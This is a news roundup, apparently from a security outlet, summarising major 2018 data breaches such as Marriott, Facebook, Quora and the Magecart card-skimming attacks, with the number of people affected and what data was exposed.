Where to start? In 2018 the mantra became “another day, another data breach.” As a result, consumers and researchers alike are feeling “breach fatigue” and getting a bit numb to the headline. But the reality is, cybercriminals are going after personal information, credit card info and passwords every single day. The sheer number of data exposures we saw this year – through hacks, misconfigurations and other human error – should be setting off alarm bells for everyone. Companies and individuals shouldn’t tune out, but should rather leap into the breach, as it were, with proactive security practices to safeguard the information they’re in charge of.
Here’s a look at some of top breach stories of the year – and the number of people affected.
- [Google+ – 52.5 Million] A pair of software vulnerabilities and a resulting privacy scandal spelled curtains this year for Google’s consumer social media effort, Google+. First, a software bug in an API for the site was discovered by Google’s own internal security team this spring that allowed outside developers to access private Google+ profile data – for three years. Google decided not to disclose it, which led to plenty of bad publicity after the WSJ reported it in October. As if that weren’t bad enough, a second API bug surfaced in November that allowed apps requesting permission to view users’ Google+ profile information to gain full permissions, even when the user was not public.
- [The Magecart Hits – Untold Millions] The Magecart Group was a busy bee throughout the year, knocking over several websites, including Ticketmaster, with its digital card skimmers. Magecart, an affiliation of several crime groups, is known to use scripts injected into websites to steal data that’s entered into online payment forms on e-commerce websites directly or through compromised third-party suppliers used by these sites – and the approach has been devastatingly effective. Ticketmaster, British Airways, Newegg, Feedify, Shopper Approved, VisionDirect – the list goes on and on. And in December, Magecart added the ability to steal site administrator credentials to the mix.
- [Marriott Hotels – 500 Million] Marriott in November revealed that up to 500 million guests’ data had been exposed and available for the taking – since 2014. Hackers gained access to the Starwood reservation database to lift a social engineer’s dreamboat package: guest information, including name, mailing address, phone number, email address, passport number, Starwood Preferred Guest account information, date of birth, gender, arrival and departure information, reservation date and communication preferences. For some, the data included encrypted payment card numbers and payment card expiration dates. Starwood, which includes hotels like St. Regis and Sheraton, was bought by Marriott in 2016.
- [Under Armour/MyFitnessPal – 150 Million] Fitness apparel firm Under Armour in March said 150 million users of its popular MyFitnessPal app were compromised after hackers accessed user names, email addresses and hashed passwords. The company received kudos for its speedy notification process – it started notifying victims four days after discovering the compromise. However, it also received criticism for some of the passwords being hashed in SHA-1, a notoriously weak encryption mechanism.
- [The Girl Scouts – 2,800] This one was by no means the biggest, but we’re including it because it caught the interest of many. In October, The Orange County, Calif. branch of the Girl Scouts of America said it was hacked. An attacker gained access to an email account used by the troop, which the malefactor then used to send out emails of his or her own. While GSOC didn’t elaborate on the type of emails, presumably this was part of a phishing effort. The deeper issue is that the account has been used to coordinate travel for members in the past, according to GSOC, so it’s possible that the adversary rifled through the inbox and found personal information for as many as 2,800 girls and their families. The cookies were safe, though.
- [Facebook and More Facebook -- 70+ Million] The social network has not had a good run, to put it mildly. In May, a Facebook software bug switched the “suggested audience” for posts to “public” for 14 million users. The glitch meant Facebook users who thought they were sharing content with just friends or small groups actually made their posts available to the general public. In September, Facebook said that hackers had exploited a flaw in its “View As” feature that left the access tokens of almost 50 million Facebook accounts ripe for the taking. And in December, Facebook disclosed a bug that enabled third-party apps to access unpublished photos of 6.8 million users.
- [NASA Data Blasts Off – Numbers TBD] NASA in December admitted that it was hacked by an unauthorized intruder back in October, and that personally identifiable information for thousands of employees was compromised, including Social Security numbers. The server in question was apparently an HR database: Those affected are NASA Civil Service employees who were hired or those who left, and those that received transfers. NASA isn’t sure of the scope yet, but the amount of information exfiltrated is potentially significant. The compromised records are from July 2006 to October 2018, i.e. 12 years’ worth of data.
- [T-Mobile – 2.3 Million] In August, wireless carrier T-Mobile alerted millions of its customers to a breach of its website that resulted in subscriber names, zip codes, phone numbers, email addresses and account numbers being stolen. The alert went to 77 million customers, but only 3 percent of subscribers were affected, totaling about 2.3 million. A T-Mobile spokesperson told Threatpost at the time that the attack targeted a specific leaky API tied to an undisclosed part of its website.
- [Ticketfly – 26 Million] Ticketfly, the events ticketing company, joined its rival, Ticketmaster, in breachland in June. Customers who went to Ticketfly’s homepage during the incident found a picture posted with the title “Ticketfly HacKeD By IsHaKdZ” that said [sic]: “Your Security Down im Not Sorry… Next time I will publish database ‘backstage.'” According to a report, the hacker notified Ticketfly about a vulnerability enabling the data breach, and then asked for one bitcoin (around $7,500 at the time) in exchange for the information. What that information consisted of hasn’t been confirmed by the company.
- [Orbitz – 880,000] Expedia-owned travel site Orbitz in March said that both its consumer and partner platforms were compromised, leading to the disclosure of 880,000 payment cards (but not the Orbitz.com website). The consumer side of the Orbitz business platform was open to attack during the first half of 2016, while the partner platform was open to attacks for almost a year, between Jan. 1, 2016 and Dec. 22, 2017, according to Expedia. The data exposed included payment card information such as names, phone numbers, email and billing addresses. Passwords are notably absent from the list.
- [Quora – 100 Million] Crowdsourced query site Quora in December found itself asking the question of “what happened?” in the wake of a massive data breach that impacted up to 100 million of its users. The incident has the dubious honor of being the biggest breach on our list (unless you combine Cambridge Analytica’s totals with Facebook’s other “issues”). The hack exposed user names, email addresses, hashed passwords, direct message content and imported data from any networks that users linked to their accounts, like Facebook or Twitter. It also gave the information thieves access to a veritable treasure trove of social engineering and profiling fodder, such as questions, answers, answer requests, comments, up votes and down votes.
Nicole on